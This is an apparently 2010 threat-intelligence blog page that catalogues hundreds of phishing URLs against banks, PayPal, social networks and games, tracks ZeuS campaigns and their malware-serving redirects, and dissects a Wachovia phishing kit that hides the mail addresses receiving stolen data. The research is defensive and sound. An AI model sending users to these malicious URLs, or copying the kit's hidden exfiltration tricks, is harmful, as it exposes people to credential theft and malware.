MalwareIntelligence is a site dedicated to research on all matters relating to anti-malware security, criminology computing and information security in general, always from a perspective closely related to the field of intelligence.

28.2.10

Phishing database III

Financial & Banking Institutions
Canada Trusth (http://www.tdcanadatrust.com/)
http://www-tdcanadatrust-com.epage.ru/td-bank-index.html
Citigroup (http://www.citigroup.com)
http://www.alanmetauro.com/home/online.citibank.com/US/JPS/portal/Index.do.htm?F6=1&F7=IB&F21=IB&F22=IB&REQUEST=ClientSignin&LANGUAGE=ENGLISH
CUA - Credit Union Australia (http://www.cua.com.au)
http://www.colconkproducts.com/pub/your-account-is-locked-cua-com-au/
http://173-11-85-81-sfba.hfc.comcastbusiness.net/images/webbanker.cua.com.au/webbanker/CUA/
UniCredit Banca (http://www.unicreditbanca.it)
http://161.58.125.218/uc/index.html
Grupo Banca Carige (http://www.gruppocarige.it/ws/gruppo/jsp/index.jsp)
http://www.iadr.or.kr/bbs/data/gruppocarige/it/grp/ws/gruppo/jsp/banca_carige/index.html
Grupo Banca Popolare Di Bari
http://www.georgiakoreans.com/bbs/data/bpr/index.html
Banca Cesare Ponti (http://www.gruppocarige.it/grp/bponti/html/ita/index.htm)
http://www.iadr.or.kr/bbs/data/gruppocarige/it/grp/ws/gruppo/jsp/banca_cesare_ponti/index.html
Banca Del Monte Di Luccia (http://www.gruppocarige.it/ws/bmlucca/jsp/index.jsp)
http://www.iadr.or.kr/bbs/data/gruppocarige/it/grp/ws/gruppo/jsp/banca_del_monte_di_lucca/index.html
CRS - Cassa di Risparmio di Savona (http://www.gruppocarige.it/ws/carisa/jsp/index.jsp)
http://www.iadr.or.kr/bbs/data/gruppocarige/it/grp/ws/gruppo/jsp/cassa_di_risparmio_di_savona/index.html
Cassa di Risparmio di Carrara (http://www.gruppocarige.it/ws/crcarrara/jsp/index.jsp)
http://www.iadr.or.kr/bbs/data/gruppocarige/it/grp/ws/gruppo/jsp/cassa_di_risparmio_di_carrara/index.html
Poste Italiane (http://www.poste.it)
http://posteitalianeonlinebpolcarteprestafgfdf.pcriot.com/posteitaliane/bpol/cartepre/formslogin.aspx.php?TYPE=33554433&REALMOID=06-b5208d98-1e41-108b-b247-8392a717ff3e&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME
http://www.ynzal.com/catalog/images/bpol/bancoposta/index.php?MfcISAPICommand=SignInFPP&UsingSSL=1&email=&userid
http://www.yelin.ru/wm/bancopostaonline.poste.it/bpol/CARTEPRE/index.php?MfcISAPICommand=SignInFPP&UsingSSL=1&email=&userid
Santander (www.santander.com)
http://slarrauri.com/tusitioweb/demo/BentoBox/modules/Logon.html
ABSA (http://www.absa.co.za)
http://markostoreltd.com/account.log/index.php
HSBC (http://www.hsbc.com)
http://worldviba.org/hboard3/bbs/indexx/hsbc/1.php?jsessionid=CAM10:jsessionid=0000RcSVT4vYF7HNB8AsppR8HRo:11j71fovq?IDV_URL=hsbc.MyHSBC_pib
http://www.ss4net.com/flash/IBlogin.html
http://www.tricitypt.com/photos/pediatrics/hsbcsecure/IBlogin.html
http://in2pool.com/Sources/.x/IBlogin.html
http://erethizon.net/pomocne/hibernace/IBlogin.php
http://cs.kku.ac.kr/data/file/alumnus/hsbconline/HSBC/index.php
http://etechsol.pk/cp/IBlogin.html
http://www.fsk-squad.eu/stats/IBlogin.html
http://www.goldenstwarriors.com/boxes/IBlogin.html
http://singaporeluggagestorage.info/modules/foles/kmg/www.hsbc.co.uk/CAM10-jsessionid=000026MQ7KnXUxsKmiYKszFUkGJ12c58ti63.htm

In the domain singaporeluggagestorage.info climbed several packages of phishing through a shell. Besides HSBC phishing pack, found others to CIBS and ING Direct.

ING Direct (http://www.ing.com)
http://singaporeluggagestorage.info/modules/foles/mijn.ing.htm
Lloyds TSB (http://www.lloydstsb.com)
http://cjuckett.com/gallery/include/login/online.lloydstsb.co.uk/online.lloydstsb.co.uk/online.lloydstsb.co.uk/online.lloydstsb.co.uk/customer.ibc/
Wachovia (http://www.wachovia.com)
http://202.111.173.205/.../wachovia/AuthService.php?action=presentLogin&url=https://onlineservices.wachovia.com/NASApp/NavApp/Titanium?action=returnHome
Bank of America (http://www.bankofamerica.com)
http://210.116.103.118/~kardex/gnuboard4/bbs/Languages/
http://ahuarqalliance.com/~ahuarqal/Pringles/www.bankofamerica.com/bofa-update/bofa-update/bofa/
J.P.Morgan (http://www.jpmorgan.com)
http://martindlk.ie/pdf_files/10/c/ch.htm?customerid=&co_partnerId=2&siteid=0&ru=&PageName=login_run&pp=pass&pageType=708XeMWZllWXS3AlBX+VShqAhQRfhgTDrf&co_partnerId=2&siteid=0&ru=&pp=&pageType=708&MfcISAPICommand=ConfirmRegistration&708XeMWZllWXS3AlBXVShqAhQRfhgTDrfQRfhgTDrfA
egg (http://www.egg.com)
http://www.extv.co.kr/data/file/s_tag08/819,00.html
http://www.wrpt.us/fireworks/Egg-Login.htm
InterSwitch (http://www.interswitchng.com)
http://2009_securityupdate1.t35.com/Nigeria_interSwitch.htm
MoneyGram (http://www.moneygram.com)
http://121.11.253.235/.cgi-bin/mg/MoneyGram/eMoneyTransfer/
Discover (http://www.discovercard.com)
https://www.discovercard.com/cardmembersvcs/loginlogout/app/ac_main
VISA (http://www.visa.com)
http://intersecure.fr/security/verified/cards/unlock/ssl/Deutschland/

Electronic Commerce
Amazon (http://www.amazon.com) http://digiplan.nl/img/xzf5465x6z4f56xz4fx5z64f5645z4x5z64f556xf4z56x4z5f45z6x4f56f4z5xf45zx64f/cxz4564z56z4z6c54cx54xc545c46z54c4zxzxfx5fz4z65f454xz5f45zx45xz64f/
PayPal (https://www.paypal.com)
http://www.revenueirish.net/~gustavo/mongis/webscrcmd=_login-submit&dispatch=5885d80a13c0db1fc53a056acd1538879f614231735d88db02692aa5ce177197.php
http://8shagyasser.com/.cc/pp/us/
http://www.revenueirish.net/~gustavo/mongis/index4.php
http://allmedwholesale.com/cache/paypal/index.htm
http://www.skizo123.com/update/
http://francomm.org/worldsecure/
http://carinethomas10.net/www.PayPal.Com22/webscrcmd=_login-done&login_access=1190737782.htm
Capitalone (http://www.capitalone.com)
http://allmedwholesale.com/cache/c/e/capitalOne/login.aspx.htm

Government Services
IRS - Internal Revenue Service (www.irs.gov)
http://www.budgetcirkus.dk/irs.gov/IRS/irs-refund-account.html
http://195.140.132.196/~dan10417/irs.gov/IRS/irs-refund-account.html
HMRC - HM Revenue & Customs (http://www.hmrc.gov.uk)
http://www.hmrc.ukonlinerefund.com/refund.php?item=1928381240348811

Online Games
World of Warcraft (http://www.worldofwarcraft.com)
http://www.worldofwarcraft-account-instrcationcheck.com/login.asp?app=wam&ref=https://www.worldofwarcraft.com/account/&eor=0&app=bam
http://www.review-billing-worldofwarcraft.com/
http://nm-jk-gh.worldofwarcraftftc.com/
http://check.worldofwarcraftfts.com/
http://account.worldofwarcraftfta.com/

Zynga Poker (http://www.zynga.com)
http://admin_zynga_security.t35.com/
http://administrator-poker.t35.com/security/account_verification/

Social Networking
Hi5 (http://www.hi5.com)
http://aipoise.t35.com/frienddisplayHomePage.do.html
MySpace (http://www.myspace.com)
http://210.51.184.12/myspace.com&session_timed_out.php
Orkut (http://www.orkut.com)
http://orkutfunky2008.50webs.com/index.HTML
http://orkutf.50webs.com/Orkut/
http://lanhousemv.t35.com/
http://abhijaan.justfree.com/2009.html
http://guuhrox.galeon.com/
Facebook (http://www.facebook.com)
http://admin_tools_zynga.t35.com/
http://admin_zynga.t35.com/
http://admin_zynga_poker.t35.com/
http://admin_zyngapokergames.t35.com/
http://adminbanned.t35.com/Zinga.Terms/
http://adminfacebookz.t35.com/Facebook.htm
http://adminforu.t35.com/facebook/facebook.php
http://ak-sdk-fbsdk-conf.t35.com/
http://funnymoneygame.t35.com/
http://facebooknewlog.t35.com/Facebook.php
http://apps-facebook-poker.t35.com/
http://newfoundsite.t35.com/facebook/Facebook.htm
Xbox Live (http://www.xbox.com)
http://anythingmicrosoft.t35.com/

WebMail
Yahoo (http://www.yahoo.com)
https://marketingsolutions.login.yahoo.com/adui/signin/displaySignin.do?d=U2FsdGVkX19cY56F3r1QvfGtU0XVsveCoTYWNnRpvZ4bILechNLfZTHvHIOFjqsAa77VmsuwGDHOvNJSa0FuwZgPFc6s8evu39eeQ.zeRGM1OZ4zVBg-&m=0&l=en_US&=
Windows Live (http://login.live.com)
http://account_validation.t35.com/Windows%20live.php
http://alw7dany.tripod.com/hotmail.htm
http://wiwaxiaa.tripod.com/
http://girl.q8sex.tripod.com/hotmail/login.srf.htm
AOL Mail (http://www.webmail.aol.com)
http://aolz.t35.com/Webmail/
http://aoltosbillingcenter.t35.com/
http://aolsn.t35.com/
AIM Express (http://www.aim.com/aimexpress.adp)
http://aoldashboard02.t35.com/aimexpress.html

File Hosting
Rapidshare (http://rapidshare.com)
http://2993amit.justfree.com/Rapidshare/files.php
http://www.rapidfree.za.pl/#200
http://easy.justfree.com/index1.php
http://willgax.justfree.com/rp/indir.php
http://babalar2.justfree.com/rp/indir.php
http://rsmany.t35.com/premiumzone.php
http://rapid24.blackapplehost.com/files.php
http://rapid24.blackapplehost.com/logon.php
http://www.phish.yoyo.pl/index.php
http://hotfilm.xaa.pl/rs/index.php
http://chronoshon.t35.com/files.php
Hotfile (http://www.hotfile.com)
http://hotfiles.justfree.com/?f=295/dl/4629684/01bd28f/Boob-E_CD1_chunk_1.rar.html
http://zsah.justfree.com/hotfile/index.php
http://indigo2.justfree.com/

Related information
Phishing database II
Phishing database I
ZeuS on IRS Scam remains actively exploited
New ZeuS phishing campaign against Google and Blogger
Facebook & VISA phishing campaign proposed by ZeuS
Dissection of a fraudulent package. Wachovia phishing attack

Jorge Mieres

Ver más

23.2.10

New ZeuS phishing campaign against Google and Blogger

A new strategy proposed by ZeuS phishing active. Previously we mentioned that the trusted entities used as part of the plan of Zeus infection and fraud involving the IRS, VISA and Facebook.

Coverage now focuses its efforts on using the name of Google and Blogger. Some of the domains used are:

http://www.google.com/update/VE.php?service=blogger

http://www.google.com/update/VE.php --> annieliu@hotpop.com
http://www.google.com/update/VE.php --> rob@boringbutgood.com
http://www.google.com/update/VE.php --> uin@vangenechten.com
http://www.google.com/update/VE.php --> julian@beweb.com
http://www.google.com/update/VE.php --> lwfcsk@khainata.com
http://www.google.com/update/VE.php --> jorgec@interlinkpr.com
http://www.google.com/update/VE.php --> hquisbert@arcobol.com

http://www.google.com.zobv.kr/update/VE.php
http://www.google.com.desr.kr
http://www.google.com.desr.or.kr
http://www.google.com.erdcq.kr
http://www.google.com.erdcd.kr
http://www.google.com.erdca.co.kr
http://www.google.com.dese.ne.kr
http://www.google.com.desv.co.kr
http://www.google.com.erdcu.co.kr
http://www.google.com.esuk.ne.kr
http://www.google.com.esus.co.kr
http://www.google.com.erdce.kr

http://www.blogger.com.desv.kr/update/VE.php --> gogo@beweb.com
http://www.blogger.com/update/VE.php
http://www.blogger.com/update/VE.php --> rob@boringbutgood.com
http://www.blogger.com/update/VE.php --> teasider@phreaker.net
http://www.blogger.com/update/VE.php --> ede@interlinkpr.com
http://www.blogger.com/update/VE.php --> r.thijs@rubber-resources.com
http://www.blogger.com/update/VE.php --> a.hendriks@rubber-resources.com
http://www.blogger.com/update/VE.php --> murdockrainwave1997@rubber-resources.com

http://www.blogger.com.esut.ne.kr
http://www.blogger.com.esus.ne.kr
http://www.blogger.com.erdcu.ne.kr
http://www.blogger.com.esuk.ne.kr
http://www.blogger.com.erdcu.or.kr
http://www.blogger.com.zobq.or.kr
http://www.blogger.com.desx.or.kr
http://www.blogger.com.erdca.co.kr
http://www.blogger.com.zobq.co.kr
http://www.blogger.com.esuk.kr

Phishing campaigns under a nomenclature similar to these (and earlier) leave evidence that the coverage they intend to take the creators of ZeuS is quite broad, and certainly in the next few days are other campaigns similar to this fraud.

Related information
Facebook & VISA phishing campaign proposed by ZeuS
ZeuS on IRS Scam remains actively exploited
Zeus and the theft of sensitive information
Leveraging ZeuS to send spam through social networks
ZeuS Botnet y su poder de reclutamiento zombi
ZeuS, spam y certificados SSL
Eficacia de los antivirus frente a ZeuS
Special!!! ZeuS Botnet for Dummies
Botnet. Securización en la nueva versión de ZeuS
Fusión. Un concepto adoptado por el crimeware actual
ZeuS Carding World Template. (...) la cara de la botnet
Financial institutions targeted by the botnet Zeus. Part two
Financial institutions targeted by the botnet Zeus. Part one
LuckySploit, the right hand of ZeuS
Botnet Zeus. Mass propagation of his Trojan. Part two
Botnet Zeus. Mass propagation of his Trojan. Part one

Jorge Mieres

Ver más

20.2.10

Facebook & VISA phishing campaign proposed by ZeuS

Updated 21.02.2010
More active domains belonging to the same phishing campaign against users of VISA. The domains are:

reports.cforms.visa.com.desz.kr/secureapps/vdir/cholderform.php
reports.cforms.visa.com.desz.ne.kr/secureapps/vdir/cholderform.php
reports.cforms.visa.com.desz.or.kr/secureapps/vdir/cholderform.php
reports.cforms.visa.com.ersm.kr/secureapps/vdir/cholderform.php
reports.cforms.visa.com.edase.or.kr/secureapps/vdir/cholderform.php
reports.cforms.visa.com.ersm.ne.kr/secureapps/

Original 20.02.2010
ZeuS has a fairly large repertoire with proposed strategies to Scam to spread their trojan and phishing attacks against banks, many companies and well known.

We have recently warned of a campaign Scam using as cover to the IRS, which has been generating a long time but every so often is reactivated, forming a cycle that seeks to disseminate criminal ZeuS and that holds for all strategies.

Now, once again active phishing campaign that involves Facebook.

The domains involved are:

http://www.facebook.com.edase.or.kr/usersdirectory/LoginFacebook.php
http://www.facebook.com.ersm.kr/usersdirectory/LoginFacebook.php
http://www.facebook.com.edasn.ne.kr/usersdirectory/LoginFacebook.php
http://www.facebook.com.desz.or.kr/usersdirectory/LoginFacebook.php
http://www.facebook.com.desz.ne.kr/usersdirectory/LoginFacebook.php
http://www.facebook.com.ersq.kr/usersdirectory/LoginFacebook.php
http://www.facebook.com.edase.co.kr/usersdirectory/LoginFacebook.php
http://www.facebook.com.edasq.kr/usersdirectory/LoginFacebook.php
http://www.facebook.com.ersw.co.kr/usersdirectory/LoginFacebook.php
http://www.facebook.com.ersa.or.kr/usersdirectory/LoginFacebook.php
http://www.facebook.com.edasn.kr/usersdirectory/LoginFacebook.php
http://www.facebook.com.edasa.ne.kr/usersdirectory/LoginFacebook.php
http://www.facebook.com.ersm.or.kr/usersdirectory/LoginFacebook.php
http://www.facebook.com.edasq.ne.kr/usersdirectory/LoginFacebook.php
http://www.facebook.com.edasn.or.kr/usersdirectory/LoginFacebook.php
http://www.facebook.com.ersa.or.kr/usersdirectory/LoginFacebook.php

Like other campaigns, the page's source code has injected a tag iframe, which in this case redirects to hxxp://109.95.114.251/us01d/in.php.

This page (in.php) redirection to:

http://109.95.114.251/us01d/load.php
http://109.95.114.251/us01d/file.exe
http://109.95.114.251/us01d/xd/pdf.pdf
http://109.95.114.251/us01d/xd/sNode.php

From whom are trying to exploit some exploits: CVE-2007-5659, CVE-2008-2992, CVE-2008-0015 and CVE-2009-0927.

This server is also currently serving another massive campaign, but spreading the trojan ZeuS through a Scam IRS. In this case, just change the folder where the package is housed, namely: hxxp://109.95.114.251/usa50/in.php

As we see, Zeus does not stop at his criminal career. In fact, there are also other campaigns more active, such as those involving a phishing attack by hiding under the VISA logo.

In this case, other domains used are:

http://reports.cforms.visa.com.edasa.or.kr/secureapps/vdir/cholderform.php
http://reports.cforms.visa.com.ersq.kr/secureapps/vdir/cholderform.php
http://reports.cforms.visa.com.edase.co.kr/secureapps/vdir/cholderform.php
http://reports.cforms.visa.com.ersq.co.kr/secureapps/vdir/cholderform.php
http://reports.cforms.visa.com.edasq.kr/secureapps/vdir/cholderform.php
http://reports.cforms.visa.com.ersm.co.kr/secureapps/vdir/cholderform.php
http://reports.cforms.visa.com.ersw.co.kr/secureapps/vdir/cholderform.php
http://reports.cforms.visa.com.ersa.or.kr/secureapps/vdir/cholderform.php
http://reports.cforms.visa.com.edasn.kr/secureapps/vdir/cholderform.php
http://reports.cforms.visa.com.edasa.ne.kr/secureapps/vdir/cholderform.php
http://reports.cforms.visa.com.ersm.or.kr/secureapps/vdir/cholderform.php
http://reports.cforms.visa.com.edasq.ne.kr/secureapps/vdir/cholderform.php
http://reports.cforms.visa.com.edase.ne.kr/secureapps/vdir/cholderform.php
http://reports.cforms.visa.com.edasq.co.kr/secureapps/vdir/cholderform.php
http://reports.cforms.visa.com.edasa.co.kr/secureapps/vdir/cholderform.php
http://reports.cforms.visa.com.edasa.kr/secureapps/vdir/cholderform.php
http://reports.cforms.visa.com.edase.kr/secureapps/vdir/cholderform.php
http://reports.cforms.visa.com.edasn.or.kr/secureapps/vdir/cholderform.php

Related information
ZeuS on IRS Scam remains actively exploited
Zeus and the theft of sensitive information
Leveraging ZeuS to send spam through social networks
ZeuS Botnet y su poder de reclutamiento zombi
ZeuS, spam y certificados SSL
Eficacia de los antivirus frente a ZeuS
Special!!! ZeuS Botnet for Dummies
Botnet. Securización en la nueva versión de ZeuS
Fusión. Un concepto adoptado por el crimeware actual
ZeuS Carding World Template. (...) la cara de la botnet
Financial institutions targeted by the botnet Zeus. Part two
Financial institutions targeted by the botnet Zeus. Part one
LuckySploit, the right hand of ZeuS
Botnet Zeus. Mass propagation of his Trojan. Part two
Botnet Zeus. Mass propagation of his Trojan. Part one

Jorge Mieres

Ver más

19.2.10

SpyEye Bot (Part two). Conversations with the creator of crimeware

In recent weeks, SpyEye (a new financial trojan) has been the talk of many for the positive acceptance was so in the underground scene due to its balance about cost/benefit, and the great impact that achievement to whiten the features in its latest version that allows systems to eliminate the activities of your competition: ZeuS.

Our previous report, “SpyEye. Analysis of a new crimeware alternative scenario,” addressed known technical issues involving the activities of this threat.

In this second part we present the exclusive interview by Ben Koehl, Crimeware Researcher of Malware Intelligence. Through interviews with the creator of crimeware, we reveal information that shows some of the thought process and brains behind the creator of SpyEye. We also see the source code for the Zeus Killer addition.

The way that Gribodemon thinks is not unique anymore in the cybercrime world. We are seeing individuals and groups becoming more specialized in the services they provide and are no longer spreading themselves thin. There are many industries within the cybercrime world. From coding to infrastructure support to public relations.

There was a large language barrier between me and the author so I had to keep the questions short and basic so his translator program could handle them (Lingvo.)  We broke up the conversation in pieces to make it flow better to the reader.

This document can be downloaded from:

English version
Spanish version

Related information
SpyEye Bot. New bot on the market
Compendio Anual de Información. El crimeware durante el 2009


Jorge Mieres

Ver más

16.2.10

Phishing database II

HSBC
http://www.silverstoneincense.com.au/IBlogin.html
http://www.buyitdirect.co.nz/images/indexx/hsbc/1.php?jsessionid=CAM10:jsessionid=0000RcSVT4vYF7HNB8AsppR8HRo:11j71fovq?IDV_URL=hsbc.MyHSBC_pib
http://delthelboi.net/COsutmer/COsutmer/hsbc/1.php?jsessionid=CAM10:jsessionid=0000RcSVT4vYF7HNB8AsppR8HRo:11j71fovq?IDV_URL=hsbc.MyHSBC_pib
http://woorizip1004.net/zboard/icon/IBlogin.html
http://www.ceipmiraflores.com/inc/ceip/IBlogin.html
http://www.lbirelandftp.com/e-card/IBlogin.html
http://www.galilee.cc/zeroboard/data/rr/CAM10.php?idv_cmd=idv.Logoff&nextPage=IDV_CAM10_AUTHENTICATION=2178611a6f5b6d7d722eacaa9c0a1f52LogonBy=Connect2178611a6f5b6d7d722eacaa9c0a1f52
http://www.officeresourcegroup.com/_analog/hsbc.co.uk/IBlogin.html
http://host24-128-static.39-79-b.business.telecomitalia.it/.personal/www.HSBC.Co.Uk/1/2/1.php?jsessionid=CAM10:jsessionid=0000RcSVT4vYF7HNB8AsppR8HRo:11j71fovq?IDV_URL=hsbc.MyHSBC_pib
http://www.officeresourcegroup.com/_analog/hsbc.co.uk/1/2/IBlogin.html
http://www.sinhvienqb.com/gallery/images/admin/IBlogin.html
http://egg-inter.com/upload/www.hsbc.co.uk/1/IBlogin.html


Citi
http://www.naturalcurves.com//wp-content/themes/blueberry-boat/online-citi-cards/citi%20card/citi%20card/update.html


CajaMadrid
http://oi-cajamadrid.com.es/CajaMadrid/oi/pt_oi/Login/


Orange
 http://92.243.8.56/Orange/info-online-verification.php
http://adminpanel.net/xcart/images/cartpictures/http-id.orange.fr-auth_user-bin-authNuser.cgidate=1266009664=skey=3a347076d2326ec771ebe84a8de131fc=service=communiquer=url=http:webmail1eb.orange.fr*webmail*fr_FR/


Visa
 http://alerts.cforms.visa.com.rep021.kr/secureapps/vdir/cholderform.php
http://92.243.8.56/VerifiedByVisa/visa/error_info.php?cmd=_login-run&dispatch=5885d80a13c0db1f1ff80d546411d7f84f1036d8f209d3d19ebb6f4eeec8bd0ef1b64e562942814a64d80bf24862819bf1b64e562942814a64d80bf24862819b?cmd=_login-run&dispatch=5885d80a13c0db1f1ff80d546411d7f84f1036d8f209d3d19ebb6f4eeec8bd0ef1b64e562942814a64d80bf24862819bf1b64e562942814a64d80bf24862819b


MasterCard
http://www.roxanalatorre.com/panel/mastercard/

Kijiji
http://kijiji-ca.wz.cz/cSignInrups-ConfirmAccount-ruq-re-direct&Dwws.html

PayPal
http://74.86.158.3/~bigbigca/uc/Activation/paypal/
http://french-kiss.org/~o103594/paypal.com/wwwpaypalcompaypalloginukusupdateinfo/webscr.php?cmd=_login-run&dispatch=2e310e6fd3c468fe3657669af990d4912e310e6fd3c468fe3657669af990d491
http://exorh.com/~o103594/paypal.com/wwwpaypalcompaypalloginukusupdateinfo/webscr.php?cmd=_login-run&dispatch=2e310e6fd3c468fe3657669af990d4912e310e6fd3c468fe3657669af990d491
http://calvarychapelabuja.com/users/barbara/account/?cmd=_login-run
http://adcomphelp.com/tutorials/cam/paypal.com/fr/cmd=_registration-run/webscr.php?cmd=_login-run&dispatch=9cf470a1ba43eb481569e296a16bd15d9cf470a1ba43eb481569e296a16bd15d
http://aempresarial.com/admin/www.PayPal.Com22/webscrcmd=_login-done&login_access=1190737782.htm
http://paypol.tk/fr/
http://is250.internetdsl.tpnet.pl/FRS/
http://office.supportacct.operaunite.com/webserver/content/?cmd=_login-run&session-redirect=noCookie
http://www.yoville.justfree.com/
http://www.anassoft.net/webscr.php
http://paypal-ag.de/see/
http://www.coinentertainment.com/images/www.paypal.com/management/financial/login.html
http://paypal-uk.webcindario.com/

eBay
http://rahasiabisnis21.com/_space/apache_module.php?customerid=hemi2u2@yahoo.com&co_partnerId=2&siteid=0&ru=&PageName=login_run&pp=pass&pageType=signin.ebay.com.ws.eBayISAPI.dll.fxHVPoQCOORAlDQoKlPMCP
http://webproxy.go2myspace.com/sell.ebay.ie/ws/eBayISAPI.dll?SellItem
http://www.vietwebdisk.com/signin.ebay.com/ws/eBayISAPI.dll?SignIn&ru=www.ebay.com
http://cosmo.genusis.com/images/icons/eee/login.html#ws/eBayISAPI.dll?SignIn&ru=http://www.ebay.com/
http://sangelecaiolor.czechian.net/polaris-rzr-W0QQitemZ250328176800QQcmdZViewItemQQptZ-logan-hash0item3a48b8d8a00_trksidsp32860c0023/z.php
http://personal-pontoon-ebay.xf.cz/2006%20Lowe%20SUNCRUISER%20BIMINI/ebaymotorsW0QQitemZ180405328696QQcmdZViewItemQQptZboat_pontoonhash=item2a00fedb38&_trksid=p4/index.php
http://www.normans.dk/catalog/images/AllinformationfromWHOISserviceisprovided.html

MegaUpload
http://www.nakudashi.blors.com/Akina/?active.to=http://www.megaupload.com/?c=login&next=d%3DPV1ZQAIJ
http://www.sweetlife.iamspace.com/jav/asia.htm
http://www.karina.blors.com/Sasaki/Studio.htm?to.url=http://www.megaupload.com/?d=RZXZ8YZ5
http://www.nakudashi.blors.com/Akina/
http://www.cocomisakura.blors.com/Sakura/cool.htm?url.active=http://www.megaupload.com/?d=HWDZS4OM
http://www.shokoakiya.blors.com/Akiyama/asiacool.htm?url.active=http://www.megaupload.com/?d=5Y6402AH
http://www.ramunagasuki.blors.com/asia/

Rapidshare

http://raapidshare.ugu.pl/premiumzone.php
http://rapidshare-premium2011.tk/
http://rs786.t35.com/logon.php
http://rapidshare-premium2011.tk/

Facebook
http://www.rep021.kr/usersdirectory/LoginFacebook.php

YouTube
http://youtube-view-all.tk/


Poste italiane
http://gerfdsafsd.pochta.ru/posste.html
http://vaguematch.com/ioncube/_/https/www.poste.it/bancoposta/online/_private/bpol/CARTEPRE/index.php?MfcISAPICommand=SignInFPP&UsingSSL=1&email=&userid=
http://www.postevita.it/postevitaTFR.fcc?TYPE=33554433&REALMOID=06-bed2d688-fca1-10a2-bc8e-8392a717ff3e&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=$SM$ZEj9fNrjJTQ1UbgR9hbQoqbSyCYN9lBONkWfqG8%2fz9C7F9%2bG8tRBmA%3d%3d&TARGET=$SM$http%3a%2f%2fwww.postevita.it%3a85%2fgestionetfr%2findex.shtml

CartaSi
http://aviso-utente.rbcmail.ru/utente-cartaSI.html

ABSA
http://www.technicalconsultants.gr/images/oziogallery2/ib.html

HaliFax
http://www.lechateauedizioni.it//components/com_performs/halifax_mail_form/index.php

Regions
http://www.lbirelandftp.com/content/Regions/Regions/

CUA (Credit Union Australia)
http://www.cua-web-banker.com/098237409823749802378905/

Walmart
http://75.32.55.145/walmart/actpatriot/walmart/details.html

Telcel
http://itelcel.byethost13.com/home_telcel/?_ideastelcel2010&_servlet_Controller_EVENT=RECARGA_PROMOCION&rnd=0.15117657
http://www.rosalux.org.mx/logs/cgi_bin-ssl/com_notes/register2.html


Windows Live Hotmail
http://www.windowslivemail.tk/
http://so7ba7elwa.ibda3.org/
http://itelcel.byethost13.com/msn.html
https://www.windowslive.co.uk/hotmailstories/

En este caso, en el mismo servidor se aloja otro phishing pero hacia la compañía Telcel, y se almacena toda la información robada: la relacionada a las tarjetas de crédito (correspondientes a TelCel) y las credenciales de acceso al webmail de Microsoft. Además de la descarga de un falso Windows Messenger 2010 que es un malware. A continuación se observa una captura del almacenamiento de credenciales.


Bank of America
http://i37.tinypic.com/1zo957a.jpg
http://i35.tinypic.com/20tp4t0.jpg


BBVA
http://87.225.254.21/vendors/shells/templates/verificacion/index.html


World of Warcraft
http://www.blizzard-account-review-blizzard.com/
http://us.bettls.net/login/login.htm?ref=https://www.worldofwarcraft.com/account/&app=wam

Tibia
http://clanprem.atspace.com/
http://clanbrazukas.atspace.com/
http://clandemonsforlite.atspace.com/
http://clanakimichi-join.atspace.com/

Banco do Brasil
http://www.ricklegrandphotography.com/own/index.htm?portalbb

Related Information

Jorge Mieres

Ver más

13.2.10

Social Engineering exploiting Olympics Games 2010

As usual, the social engineering techniques are a fundamental pattern for attacks of any kind and magnitude.

From this perspective, any news in a few minutes covering the media more important globally, or any event whose importance is known to people from all over the world, is an object in power to exploit his image with fraudulently the intention of spreading malware.

The Olympic Games 2010 to be developed in the Canadian city of Vancouver, is one of those events in which security professionals sharpen their senses because they know perfectly well that any campaign will find uses as an excuse to spread this event.

Under this premise, and began to spot the early signs. Here is a website exclusively created to spread malware, and whose vision is very similar to the actual page of the Olympic Games 2010.

Here we can see a screenshot of the actual page and false respectively, which notes that in addition to visual social engineering strategy employed, an important part of the deception lies in the domain name, namely:

Real Website - http://www.vancouver2010.com
Fake Website - http://vaucouver2010.com
In this instance, when the user accesses the fake page instead of automatically display the video presentation, is the alleged error in the flash plugin, offering to download a binary called flash-plugin_update.45125 (MD5:45E21E0CDA8D456B26D1808D4ACB76B0) which is a malware with a very low detection rate.


The website is hosted on a German ISP, the IP address 188.40.84.202. However, the executable is downloaded from electricmediadata.com (67.15.47.189) housed in ThePlanet under ASN21844; identified as:
  • Botnet C&C servers
  • Phihing servers
  • Spam servers
  • Malware servers
Although this scenario at present not surprising, since it's well known that in the process of propagation/infection there is always an important element of deception, malware infection rate during the initial stage of propagation vector used as engineering social policy, remains very high.

This leads to two questions for anything trivial. First, the social engineering techniques are a key condiment spread processes don't go out of fashion, and on the other, depending on this and, especially taking into account their high impact in the level of effectiveness, it seems that there is a very poor culture in prevention, or is that... the processes of awareness simply not enough?

Related Information
Visual social engineering to spread malware
Deception techniques that do not go out of style
Ingeniería Social visual y el empleo de pornografía como vector de propagación e infección II
Ingeniería Social visual y el empleo de pornografía como vector de propagación e infección

Jorge Mieres

Ver más

12.2.10

Dissection of a fraudulent package. Wachovia phishing attack

In one of our most recent posts have published a series of links to phishing pages against various entities. Today we will analyze one of them, an attack aimed at Wachovia bank customers.

To this end, we got the full kit and have begun to analyze the files contained in it. Basically there are a few files PHP, HTML, various images and three style sheets.

If we look at one of the php files: BiMaR.php, we see the following:

So far so normal, typical data collection forms shown and sending a couple of email addresses.

But if we look in detail, we see that line 4 is somewhat peculiar. The variable $messege is misspelled and is not used in the rest of the script, instead using the variable $message. Moreover, its value is a base64 encoded string. If the decode get this:

$send = "dopret2001@gmail.com.dopret2001@yahoo.com";

A couple of e-mail ... weird.

We analyze one of the files: details.php, and we are having another striking piece of code:

If you decode the string we get two email addresses:

anpyth@aol.com,e.b1952@menara.ma

Under this scenario, our first thought is that perhaps we are witnessing a backdoor, through which the creator of phishing data pack to steal their customers. To make matters worse, in that parts of the code file is somewhat strange: the first isn't very well formed and the second with the eval function is very suspect.

To go deeper into the analysis, we proceed to install the package into a web server and surf the fraudulent site, filling in the fields to see the behavior of the pack.

Once we reached the last step, and confirm the data, the page makes the expected private information sent via SMTP, with one exception: the destination addresses aren't any that we located in php files.

Quickly do a search of the addresses in the entire directory, including the images, but with negative results. Obviously, from somewhere have to leave all these directions, but ... where?

Listing directory that houses the images and style sheets can be seen that the size of one of the CSS file is much larger than others, so I edit. Everything seems normal until after the middle of a block file are unreadable, even appearing as Chinese characters, which obviously has all the hallmarks of being the cause of unexpected behavior.

We finished rolls up and review the PHP files to track and finally get results. The file AuthService.php has several functions that are somewhat cryptic calling each other forming a chain.

So we put a couple of "echos" in strategic places and presto!, Our friend appears before our eyes:

A code similar to the file BiMaR.php but with 6 different email addresses, which is where you actually send the stolen information.
  • usa813@inbox.com
